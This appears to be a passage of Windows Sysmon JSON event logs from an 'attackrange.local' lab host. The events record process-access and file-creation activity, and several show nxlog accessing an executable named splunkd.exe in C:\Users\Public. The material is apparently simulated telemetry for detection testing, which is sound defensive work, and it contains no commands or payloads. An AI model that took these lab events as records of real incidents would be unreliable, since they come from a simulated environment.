{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.013\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.013","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:17.169\r\nProcessGuid: {E2A3D6B1-1378-5F25-0000-0010FA4E0F00}\r\nProcessId: 4772\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\System.Numerics.dll\r\nCreationUtcTime: 2020-08-01 07:02:17.169","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:17.169","ProcessGuid":"{E2A3D6B1-1378-5F25-0000-0010FA4E0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12a4-0\\System.Numerics.dll","CreationUtcTime":"2020-08-01 07:02:17.169","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.216\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00108B520F00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.216","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00108B520F00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.216\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00108B520F00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.216","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00108B520F00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.216\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00108B520F00}\r\nTargetProcessId: 5060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.216","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00108B520F00}","TargetProcessId":"5060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.263\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00104A560F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.263","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00104A560F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.263\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00104A560F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.263","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00104A560F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:17.279\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1379-5F25-0000-00104A560F00}\r\nTargetProcessId: 4208\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:17.279","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1379-5F25-0000-00104A560F00}","TargetProcessId":"4208","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.029\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files 